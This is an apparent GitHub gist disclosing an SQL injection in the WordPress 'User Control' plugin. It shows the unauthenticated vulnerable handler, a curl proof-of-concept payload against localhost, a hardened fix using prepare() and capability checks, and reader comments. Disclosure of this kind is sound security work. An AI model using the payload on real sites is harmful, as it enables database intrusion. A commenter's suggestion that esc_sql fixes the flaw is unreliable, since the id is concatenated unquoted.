@JustThomas
Last active May 22, 2021 16:36
SQL Injection vulnerability in WordPress "User Control" plugin

The User Control plugin gives administrators the possibility to disable user accounts in WordPress. Users whose accounts have been disabled can no longer sign in to WordPress. Unfortunately, the plugin has some serious vulnerabilities that let any visitor run SQL queries against the WordPress database.

The plugin has been removed from the official WordPress plugin repository. If this plugin is installed on your WordPress installation, you should remove it ASAP.

Vulnerable code

The plugin contains the following code, which is executed on every page load:

// No capability check and no nonce check: any POST request reaches this code.
if(isset($_POST['disable']))
{
	foreach ( $_POST['users'] as $userid ) {
		// $userid is concatenated unquoted; escaping quotes does nothing for "1; SELECT ..."
		$wpdb->query("UPDATE ".$wpdb->prefix."usercontrol SET disable_status = 'disabled' WHERE ID = ".$wpdb->escape($userid));
	}
}

if(isset($_POST['enable']))
{
	foreach ( $_POST['users'] as $userid ) {
		// Same pattern as above, so the same injection works here.
		$wpdb->query("UPDATE ".$wpdb->prefix."usercontrol SET disable_status = 'enabled' WHERE ID = ".$wpdb->escape($userid));
	}
}

This code is executed for logged-in users as well as anonymous users. No authentication or capability check is performed before it runs.

SQL injection

Any website visitor can abuse this by sending an HTTP POST request with the variable disable=1 and users=1; /* some malicious SQL query statement here */. The malicious SQL query will then be executed.

Example

curl -X POST -d "disable=1&users=1%3B%20SELECT%20%2A%20FROM%20%60wp_options%60" http://localhost/
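For comparison, here is a hardened version of the same handler. This is an added example, not code from the plugin or from the gist: it restricts the action to administrators, requires a nonce, and binds the user id as an integer with $wpdb->prepare() so the value can never be interpreted as SQL. The hook name, the nonce action and the manage_options capability are my own choices; the table and column names follow the snippet above.

```php
<?php
// Added example, not the plugin's code. Assumes a WordPress environment where
// $wpdb, current_user_can(), check_admin_referer() and add_action() exist.
// The form that posts here must include
//   wp_nonce_field( 'usercontrol_status', 'usercontrol_nonce' );
// and a hidden field action=usercontrol_status (assumed names).

function usercontrol_handle_status_change() {
    global $wpdb;

    if ( ! isset( $_POST['disable'] ) && ! isset( $_POST['enable'] ) ) {
        return;
    }

    // Authorisation: only users who may manage the site can change account status.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // CSRF protection: dies unless a valid nonce for this action is present.
    check_admin_referer( 'usercontrol_status', 'usercontrol_nonce' );

    $status = isset( $_POST['disable'] ) ? 'disabled' : 'enabled';

    // Coerce every submitted id to an integer. Non-numeric input such as
    // "1; SELECT * FROM wp_options" becomes 1 (or 0, which array_filter drops).
    $ids = array_filter( array_map( 'intval', (array) ( $_POST['users'] ?? array() ) ) );

    foreach ( $ids as $userid ) {
        // %d and %s are bound by prepare(); the id is emitted as a bare integer
        // and the status as a quoted, escaped string. Unlike the original, the
        // value is never concatenated into the query text.
        $wpdb->query( $wpdb->prepare(
            "UPDATE {$wpdb->prefix}usercontrol SET disable_status = %s WHERE ID = %d",
            $status,
            $userid
        ) );
    }
}

// admin_post_{action} only fires for logged-in users posting to admin-post.php;
// there is deliberately no admin_post_nopriv_ counterpart for anonymous visitors.
add_action( 'admin_post_usercontrol_status', 'usercontrol_handle_status_change' );
```

Note that the original's $wpdb->escape() only adds backslashes before quote characters; because the id is concatenated without surrounding quotes, a payload such as 1; SELECT ... contains nothing to escape, which is why escaping alone never closed this hole.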
@ignacionelson

ignacionelson commented Feb 15, 2018

Adding && is_user_logged_in() to the if clause should prevent this from happening, unless I'm missing something.
EDIT: That's just quick thought. The check should also validate that the logged in user is an admin

@0xdeadbeer

> Adding && is_user_logged_in() to the if clause should prevent this from happening, unless I'm missing something.
> EDIT: That's just quick thought. The check should also validate that the logged in user is an admin

Well yes but no, if we focus mainly on the SQL injection part, that's not how it should be solved, because the problem is a different one. You see that $wpdb->escape()? Well, that is calling an old and deprecated function of WordPress that does not correctly escape the quotes. And that should already give you an idea of why there's an SQL injection vulnerability in there. How you would solve that is by changing $wpdb->escape to $wpdb->prepare or $wpdb->esc_sql.
